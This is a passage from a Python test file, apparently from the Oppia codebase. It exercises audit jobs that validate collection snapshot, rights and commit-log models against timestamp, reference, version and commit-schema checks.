test_utils.GenericTestBase):
def setUp(self):
super(CollectionSnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
if collection.id != '0':
collection_services.save_new_collection(
self.owner_id, collection)
else:
collection_services.save_new_collection(
self.user_id, collection)
self.model_instance_0 = (
collection_models.CollectionSnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
collection_models.CollectionSnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
collection_models.CollectionSnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.CollectionSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
collection_services.update_collection(
self.owner_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
expected_output = [
u'[u\'fully-validated CollectionSnapshotMetadataModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'CollectionSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_models.CollectionModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_ids '
'field check of CollectionSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field collection_ids '
'having value 0, expect model CollectionModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'collection_ids having value 0, expect model '
'CollectionModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'CollectionSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of CollectionSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'CollectionSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_collection_version_in_model_id(self):
model_with_invalid_version_in_id = (
collection_models.CollectionSnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for collection model '
'version check of CollectionSnapshotMetadataModel\', '
'[u\'Entity id 0-3: Collection model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated CollectionSnapshotMetadataModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_collection_node',
}, {
'cmd': 'delete_collection_node',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'delete_collection_node check of '
'CollectionSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'delete_collection_node\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: '
'exploration_id, The following extra attributes '
'are present: invalid_attribute"]]'
), (
u'[u\'failed validation check for commit cmd '
'add_collection_node check of '
'CollectionSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'add_collection_node\'} failed '
'with error: The following required attributes are '
'missing: exploration_id"]]'
), u'[u\'fully-validated CollectionSnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class CollectionSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(CollectionSnapshotContentModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection_services.save_new_collection(self.owner_id, collection)
self.model_instance_0 = (
collection_models.CollectionSnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
collection_models.CollectionSnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
collection_models.CollectionSnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.CollectionSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
collection_services.update_collection(
self.owner_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
expected_output = [
u'[u\'fully-validated CollectionSnapshotContentModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'CollectionSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_models.CollectionModel.get_by_id('0').delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_ids '
'field check of CollectionSnapshotContentModel\', '
'[u"Entity id 0-1: based on field collection_ids '
'having value 0, expect model CollectionModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'collection_ids having value 0, expect model '
'CollectionModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'CollectionSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_collection_version_in_model_id(self):
model_with_invalid_version_in_id = (
collection_models.CollectionSnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for collection model '
'version check of CollectionSnapshotContentModel\', '
'[u\'Entity id 0-3: Collection model corresponding to '
'id 0 has a version 1 which is less than '
'the version 3 in snapshot content model id\']]'
), (
u'[u\'fully-validated CollectionSnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(CollectionRightsModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
editor_email = 'user@editor.com'
viewer_email = 'user@viewer.com'
self.signup(editor_email, 'editor')
self.signup(viewer_email, 'viewer')
self.editor_id = self.get_user_id_from_email(editor_email)
self.viewer_id = self.get_user_id_from_email(viewer_email)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection_services.save_new_collection(self.owner_id, collection)
rights_manager.assign_role_for_collection(
self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
rights_manager.assign_role_for_collection(
self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
self.model_instance_0 = (
collection_models.CollectionRightsModel.get_by_id('0'))
self.model_instance_1 = (
collection_models.CollectionRightsModel.get_by_id('1'))
self.model_instance_2 = (
collection_models.CollectionRightsModel.get_by_id('2'))
self.job_class = (
prod_validation_jobs_one_off.CollectionRightsModelAuditOneOffJob)
def test_standard_operation(self):
rights_manager.publish_collection(self.owner, '0')
expected_output = [
u'[u\'fully-validated CollectionRightsModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionRightsModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionRightsModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_first_published_datetime_than_current_time(self):
rights_manager.publish_collection(self.owner, '0')
rights_manager.publish_collection(self.owner, '1')
self.model_instance_0.first_published_msec = (
self.model_instance_0.first_published_msec * 1000000.0)
self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for first published msec check '
'of CollectionRightsModel\', '
'[u\'Entity id 0: The first_published_msec field has a '
'value %s which is greater than the time when the job was '
'run\']]'
) % (self.model_instance_0.first_published_msec),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_models.CollectionModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 0: based on field collection_ids having '
'value 0, expect model CollectionModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_owner_user_model_failure(self):
rights_manager.assign_role_for_collection(
self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for owner_user_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 0: based on field owner_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_editor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
expected_output = [
(
u'[u\'failed validation check for editor_user_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 0: based on field editor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.editor_id, self.editor_id),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_viewer_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
expected_output = [
(
u'[u\'failed validation check for viewer_user_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 2: based on field viewer_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.viewer_id, self.viewer_id),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model '
'CollectionRightsSnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'
),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
collection_models.CollectionRightsSnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model CollectionRightsSnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(CollectionRightsSnapshotMetadataModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
if collection.id != '0':
collection_services.save_new_collection(
self.owner_id, collection)
else:
collection_services.save_new_collection(
self.user_id, collection)
self.model_instance_0 = (
collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.CollectionRightsSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated CollectionRightsSnapshotMetadataModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_rights_model_failure(self):
collection_models.CollectionRightsModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_rights_ids '
'field check of CollectionRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field collection_rights_ids '
'having value 0, expect model CollectionRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'collection_rights_ids having value 0, expect model '
'CollectionRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of CollectionRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_collection_version_in_model_id(self):
model_with_invalid_version_in_id = (
collection_models.CollectionRightsSnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for collection rights model '
'version check of CollectionRightsSnapshotMetadataModel\', '
'[u\'Entity id 0-3: CollectionRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'change_collection_status',
'old_status': rights_manager.ACTIVITY_STATUS_PUBLIC,
}, {
'cmd': 'release_ownership',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'change_collection_status check of '
'CollectionRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation for '
'command: {u\'old_status\': u\'public\', '
'u\'cmd\': u\'change_collection_status\'} failed with error: '
'The following required attributes are missing: '
'new_status"]]'
), (
u'[u\'failed validation check for commit cmd '
'release_ownership check of '
'CollectionRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'release_ownership\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following extra attributes are present: '
'invalid_attribute"]]'
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsSnapshotContentModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(CollectionRightsSnapshotContentModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection_services.save_new_collection(self.owner_id, collection)
self.model_instance_0 = (
collection_models.CollectionRightsSnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
collection_models.CollectionRightsSnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
collection_models.CollectionRightsSnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.CollectionRightsSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated CollectionRightsSnapshotContentModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionRightsSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionRightsSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_models.CollectionRightsModel.get_by_id('0').delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_rights_ids '
'field check of CollectionRightsSnapshotContentModel\', '
'[u"Entity id 0-1: based on field collection_rights_ids '
'having value 0, expect model CollectionRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'collection_rights_ids having value 0, expect model '
'CollectionRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_collection_version_in_model_id(self):
model_with_invalid_version_in_id = (
collection_models.CollectionRightsSnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for collection rights model '
'version check of CollectionRightsSnapshotContentModel\', '
'[u\'Entity id 0-3: CollectionRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot content model id\']]'
), (
u'[u\'fully-validated CollectionRightsSnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class CollectionCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(CollectionCommitLogEntryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection_services.save_new_collection(self.owner_id, collection)
self.rights_model_instance = (
collection_models.CollectionCommitLogEntryModel(
id='rights-1-1', user_id=self.owner_id,
username=self.OWNER_USERNAME, collection_id='1',
commit_type='edit', commit_message='', commit_cmds=[],
post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
post_commit_community_owned=False,
post_commit_is_private=False))
self.rights_model_instance.put()
self.model_instance_0 = (
collection_models.CollectionCommitLogEntryModel.get_by_id(
'collection-0-1'))
self.model_instance_1 = (
collection_models.CollectionCommitLogEntryModel.get_by_id(
'collection-1-1'))
self.model_instance_2 = (
collection_models.CollectionCommitLogEntryModel.get_by_id(
'collection-2-1'))
self.job_class = (
prod_validation_jobs_one_off
.CollectionCommitLogEntryModelAuditOneOffJob)
def test_standard_operation(self):
collection_services.update_collection(
self.owner_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
expected_output = [
u'[u\'fully-validated CollectionCommitLogEntryModel\', 5]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
self.rights_model_instance.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_models.CollectionModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_ids '
'field check of CollectionCommitLogEntryModel\', '
'[u"Entity id collection-0-1: based on field collection_ids '
'having value 0, expect model CollectionModel with id 0 '
'but it doesn\'t exist", u"Entity id collection-0-2: based '
'on field collection_ids having value 0, expect model '
'CollectionModel with id 0 but it doesn\'t exist"]]'
), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(
self, expected_output, literal_eval=True)
def test_missing_collection_rights_model_failure(self):
collection_models.CollectionRightsModel.get_by_id('1').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_rights_ids '
'field check of CollectionCommitLogEntryModel\', '
'[u"Entity id rights-1-1: based on field '
'collection_rights_ids having value 1, expect model '
'CollectionRightsModel with id 1 but it doesn\'t exist"]]'
), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(
self, expected_output, sort=True)
def test_invalid_collection_version_in_model_id(self):
model_with_invalid_version_in_id = (
collection_models.CollectionCommitLogEntryModel.create(
'0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
'msg', [{}],
constants.ACTIVITY_STATUS_PUBLIC, False))
model_with_invalid_version_in_id.collection_id = '0'
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for collection model '
'version check of CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: Collection model corresponding '
'to id 0 has a version 1 which is less than '
'the version 3 in commit log entry model id\']]'
) % (model_with_invalid_version_in_id.id),
u'[u\'fully-validated CollectionCommitLogEntryModel\', 4]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_id(self):
model_with_invalid_id = (
collection_models.CollectionCommitLogEntryModel(
id='invalid-0-1', user_id=self.owner_id,
username=self.OWNER_USERNAME, commit_type='edit',
commit_message='msg', commit_cmds=[{}],
post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
post_commit_is_private=False))
model_with_invalid_id.collection_id = '0'
model_with_invalid_id.put()
expected_output = [
(
u'[u\'failed validation check for model id check of '
'CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % (model_with_invalid_id.id), (
u'[u\'failed validation check for commit cmd check of '
'CollectionCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
'No commit command domain object defined for entity with '
'commands: [{}]\']]'),
u'[u\'fully-validated CollectionCommitLogEntryModel\', 4]']
run_job_and_check_output(self, expected_output, sort=True)
